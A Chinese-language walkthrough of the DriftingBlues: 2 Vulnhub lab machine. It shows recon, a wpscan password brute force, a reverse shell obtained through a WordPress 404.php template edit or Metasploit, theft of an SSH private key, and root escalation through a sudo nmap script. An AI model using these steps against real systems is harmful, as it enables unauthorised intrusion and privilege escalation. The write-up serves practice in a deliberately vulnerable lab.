[Vulnhub靶机] DriftingBlues: 2

Vulnhub靶机\] DriftingBlues: 2靶机渗透思路及方法(个人分享) **靶机下载地址:** [https://download.vulnhub.com/driftingblues/driftingblues2.ova](https://download.vulnhub.com/driftingblues/driftingblues2.ova "https://download.vulnhub.com/driftingblues/driftingblues2.ova") *** ** * ** *** **靶机地址:192.168.67.21** **攻击机地址:192.168.67.3** *** ** * ** *** ## 一、信息收集 1.使用 **arp-scan**命令扫描网段内存活的主机,以获取靶机ip地址 > arp-scan -I 指定网卡 -l ![20602181a98c4db6ad45166bd74993a0.png](https://file.jishuzhan.net/article/1742549076148228097/18cd7fb33e9d580ce993779964c69c20.webp) 2.使用**nmap**工具扫描靶机开放端口、服务版本以及系统版本,得到开放端口21、22、80及其服务ftp、ssh、http > nmap -sV -O 靶机地址 > > -sV 探测主机服务版本 > > -O 识别主机操作系统 ![ed092ec92aab4d87af520df9c49e2072.png](https://file.jishuzhan.net/article/1742549076148228097/63080c0b42f0c1920123905109d4d80e.webp) 3.访问网站,和查看网页源代码都没有发现有什么有用的信息,通过Wappalyzer插件查看网站信息,发现该网站的CMS是WordPress ![2188279f39a94674b015de8b766e3689.png](https://file.jishuzhan.net/article/1742549076148228097/edfe7e4ed08e26b29bdd9c3fa1a9a290.webp) ![c07cf0d76e8f40559ff4912b2eed906c.png](https://file.jishuzhan.net/article/1742549076148228097/57e5b8bb027bbb89e8b1afedd9ed43c8.webp) 4.访问ftp,利用匿名用户登录(用户名为ftp或anonymous,密码为空),查看后发现一个secret.jpg图片,将图片下载到本地进行查看分析,也没有找到什么有用的信息 ![f0ae433661cd469d9b8688522fcfc6bc.png](https://file.jishuzhan.net/article/1742549076148228097/e4d813b59ffa14141a2122a4f0187cf9.webp) ![4493842d028f456490d1e365af36a9e6.png](https://file.jishuzhan.net/article/1742549076148228097/1ed56b5adb5a53dc5c73d13f1300ba29.webp) 5.将思路重新放在网站上,使用**dirsearch**工具对网站目录进行扫描,获得/blog和/blog/wp-login.php文件,该文件就是WordPress系统中负责用户登录和认证的文件 > dirsearch -u 靶机URL > > -u 指定目标URL ![6967701ef41842a783969f378568e5e1.png](https://file.jishuzhan.net/article/1742549076148228097/fa513fd12e9bd18e908638ce3c6bb714.webp) 6.在访问/blog时,点击跳转按钮,多次跳转到driftingblues.box域名下的地址,猜测可能需要使用域名进行访问,更改hosts文件,再次登录/blog/wp-login.php网页,获得登录页面 ![1cd73163668b4c4a847f86bd96e63cc1.png](https://file.jishuzhan.net/article/1742549076148228097/fb899331dfabbd66e804ced6ef84cc35.webp) ![798c60d0b2fc4c52acd5c433159fb4be.png](https://file.jishuzhan.net/article/1742549076148228097/256442a1786ef065bedc0a410d14b700.webp) ![fcb5093581ad4ca6bdc85eea89b4aa74.png](https://file.jishuzhan.net/article/1742549076148228097/e93c463acac050bed1e48a127f090028.webp) ## 二、漏洞利用 尝试使用 **wpscan**工具对登录使用的用户名和密码进行爆破,获得用户名/密码(albert/scotland1) > wpscan --url http://driftingblues.box/blog --enumerate u > > --url 目标URL > > --enumerate enumerate参数指定u,枚举站点用户名 ![2e672781165b4e718b051d400364c4d6.png](https://file.jishuzhan.net/article/1742549076148228097/23c0dafccd546816e5af636c57152ff6.webp) ![fdb1f49d4b414dfc964f20506b3f9476.png](https://file.jishuzhan.net/article/1742549076148228097/1b83cfd0e0a02972fc9ec4c407a04cbe.webp) > wpscan --url http://driftingblues.box/blog/ -P /usr/share/wordlists/rockyou.txt --usernames albert > > -P 指定密码字典 > > --usernames 指定用户名 > > **/usr/share/wordists/rockyou.txt** 是kali系统自带的密码文件,默认是个压缩包需要自行解压 ![89568933d2ce4775a0a86a28248589f5.png](https://file.jishuzhan.net/article/1742549076148228097/8ce7f395ce7dfe3cd10948de45ac506e.webp) ![a4864d5f06de470daddb8029d49c7737.png](https://file.jishuzhan.net/article/1742549076148228097/9b16b15bb2b82026ca3aaab3b9c26a01.webp) ## 三、反弹shell 此时有两种反弹shell的方法: 第一种:将php reverse shell的代码写入替换Theme File Editor中的404.php模版,如果可以update file成功,就可以获取目标主机的shell; 第二种:利用Wordpress的漏洞,使用Metasploit工具中的Metasploit中的exploit/unix/webapp/wp_admin_shell_upload模块获取目标主机的Shell ### 第一种反弹shell方法 1.使用刚才爆破获得的用户名/密码登录网站,进入管理系统内,到Theme File Editor页面,选择404.php模版进入网页内 ![68453cbdeaf2487bb53c90804e592d15.png](https://file.jishuzhan.net/article/1742549076148228097/45e7c29d77233bd26efed673a5e7cdcd.webp) 2.在攻击机打开nc监听 > nc -lvp 监听端口号 靶机地址 > > -l 开启监听 > > -v 显示详细输出 > > -p 指定监听端口 ![64451641726b45ca8fa816bd6cfa7a7f.png](https://file.jishuzhan.net/article/1742549076148228097/88fa9ee58e5fbfe90f1e777360ae2fa6.webp) 3.将php reverse shell的代码写入到404.php模版中,点击Update File按钮 php reverse shell的代码地址:[php-reverse-shell - 菜鸟学院](http://www.noobyard.com/article/p-xwtuqcsv-gc.html "php-reverse-shell - 菜鸟学院") ![851f2cf92c00476c80306fb40c381f05.png](https://file.jishuzhan.net/article/1742549076148228097/351f16c58700a76c6a3431650a3ad45c.webp) 4.在攻击机中访问靶机网站中一个不存在的页面,成功反弹shell(可惜利用该脚本反弹的shell无法通过python中的pty模块创建交互式shell,大家可以试试其他博主写的脚本 ),且shell权限为www-data > 访问不存在的页面:http://driftingblues.box/blog/index.php/xxx/xxx ![e3447789fc494122a97961685b2ff7bb.png](https://file.jishuzhan.net/article/1742549076148228097/f1f1909ccf089c04148ae4f0d5141bc7.webp) ### 第二种反弹shell方法 1.打开 msf,使用命令进入exploit/unix/webapp/wp_admin_shell_upload模块 > msfconsole 打开msf命令(在终端输入) > > use exploit/unix/webapp/wp_admin_shell_upload 进入模块命令 ![8a4f5ac7a774468dae2f87fd29500dad.png](https://file.jishuzhan.net/article/1742549076148228097/91e369235bc838c29f2a89ee731e5396.webp) 2.查看需要配置的参数,并对模块参数进行配置,并再次查看配置参数进行检查(要检查好确认配置成功) > show options 查看配置参数 > > set 属性名 对参数进行配置 ![851bdf2fcb3f482cbac8b3a94942c97e.png](https://file.jishuzhan.net/article/1742549076148228097/90a0d571ae669d65e4851539c5b13090.webp) ![6eb1a6c1a2264152802d06d42b2ebff8.png](https://file.jishuzhan.net/article/1742549076148228097/dcf7cc583632e7cc9ca10855d6880e92.webp) 3.配置完成,运行命令获取目标靶机的shell,通过命令打开交互式界面 > run或exploit 执行漏洞模块命令 > > shell -t 打开交互式界面(在meterpreter界面执行) > > run或exploit命令的区别: > > exploit命令用于选择并执行一个特定的漏洞利用模块。当你在Metasploit中找到了一个适合目标系统的漏洞利用模块后,你可以使用exploit命令来执行该模块,尝试利用目标系统上的漏洞。这个命令通常用于实际的攻击过程,以获取对目标系统的访问权限或控制权。 > > run命令则用于执行当前已选定的模块或脚本。在Metasploit中,可以通过一系列的操作来选择并配置一个模块,然后使用run命令来执行该模块。这个命令通常用于执行各种辅助模块、扫描模块、信息收集模块等,并非直接用于实施攻击。 > > shell -t命令的作用是创建一个交互式的本地shell。这个命令允许用户在受感染的系统上执行命令,并与目标系统进行交互。 ![9b62f5fe545b4fb1ba23a0bcb665a5da.png](https://file.jishuzhan.net/article/1742549076148228097/9f6c64e019187e97d9d9127a5a897a0c.webp) ## 四、提权 1.在对系统文件进行查看分析之后,我们发现在/home目录下有一个freddie用户的家目录文件,并且发现该目录下存在一个.ssh目录,该目录下存在id_rsa(私钥文件),且该文件有可读权限 ![7f47317083f74fc1994255637a71ea61.png](https://file.jishuzhan.net/article/1742549076148228097/855186ae8530d4a80aec86638ae7e183.webp) ![e55295f3a29a4dd4b94b485a9da85780.png](https://file.jishuzhan.net/article/1742549076148228097/47439ce82b1e01a9c584841f66cb2d9f.webp) 2.我们查看id_rsa文件内容,将内容复制到本地,并将文件权限改为只有所属可读可写 > chmod 600 id_rsa 更改id_rsa文件权限为所属可读可写 ![cd4e887cdf5d46c48ad20df7f7a6bb4d.png](https://file.jishuzhan.net/article/1742549076148228097/a42de27f3d051fa36709fffee7ce5f42.webp) ![91e938f104cb43e7837c07c92cfe98bc.png](https://file.jishuzhan.net/article/1742549076148228097/e96efa09823f33b29b5fe65de8d5f4eb.webp) 3.使用私钥进行ssh远程登录,登录到freddie用户 ![0184c3c58d1a405383a5a780224442cf.png](https://file.jishuzhan.net/article/1742549076148228097/4093ec9b7aef44b3d8fffbbfb7b5dfac.webp) 4.习惯性用find命令查找特殊权限文件,进行尝试发现无法利用。但是其中有sudo命令,我们可以使用命令查看当前用户以超级用户(root)权限执行的命令,我们发现了nmap命令 > sudo -l 用于列出当前用户可以以超级用户(root)权限运行的命令 > > 这个命令会检查用户的sudo权限,并显示该用户能够执行的命令列表。通过使用sudo -l,用户可以查看自己被授权使用sudo命令时可以执行的特定命令。 ![e67489c7d70042ddbdf509e5e3f61222.png](https://file.jishuzhan.net/article/1742549076148228097/8cc227ef4853904bcb8fc60c852daa44.webp) 5.利用nmap脚本进行提权,成功提权至root权限 > echo "os.execute('/bin/bash')" \> shell.nse > > sudo nmap --script=shell.nse > > --script 指定要加载的脚本 > > 写一个nmap脚本(nmap脚本必须以nse为后缀),其中写入提权命令,利用nmap会以root权限执行命令的漏洞进行提权 > > 在nmap脚本中,os.execute()函数是用于执行操作系统命令的Lua函数之一。通过使用os.execute()函数,可以在Nmap脚本中执行操作系统命令,并获取其输出。它接受一个字符串参数,该字符串包含要执行的命令。 ![ee58c53007d2447f8f2e01ff9a64fa46.png](https://file.jishuzhan.net/article/1742549076148228097/cf959de19297a5799e8f3fb4bd157012.webp)

相关推荐
2501_915921432 小时前
iOS IPA 混淆实测分析:从逆向视角验证加固效果与防护流程
websocket·网络协议·tcp/ip·http·网络安全·https·udp
2501_915918412 小时前
打造可观测的 iOS CICD 流程:调试、追踪与质量保障全记录
websocket·网络协议·tcp/ip·http·网络安全·https·udp
2501_915909066 小时前
调试 WebView 旧资源缓存问题:一次从偶发到复现的实战经历
websocket·网络协议·tcp/ip·http·网络安全·https·udp
2501_915921438 小时前
请求未达服务端?iOS端HTTPS链路异常的多工具抓包排查记录
websocket·网络协议·tcp/ip·http·网络安全·https·udp
2501_9160074713 小时前
iOS 接口频繁请求导致流量激增?抓包分析定位与修复全流程
websocket·网络协议·tcp/ip·http·网络安全·https·udp
2501_9160137414 小时前
用Fiddler中文版抓包工具掌控微服务架构中的接口调试:联合Postman与Charles的高效实践
websocket·网络协议·tcp/ip·http·网络安全·https·udp
00后程序员张16 小时前
调试 WebView 接口时间戳签名问题:一次精细化排查和修复过程
websocket·网络协议·tcp/ip·http·网络安全·https·udp
Whoisshutiao17 小时前
Python网安-zip文件暴力破解(仅供学习)
开发语言·python·网络安全
柴郡猫^O^17 小时前
OSCP - Proving Grounds - DC - 1
安全·网络安全·安全性测试
浩浩测试一下10 天前
渗透测试指南(CS&&MSF):Windows 与 Linux 系统中的日志与文件痕迹清理
linux·运维·windows·安全·web安全·网络安全·系统安全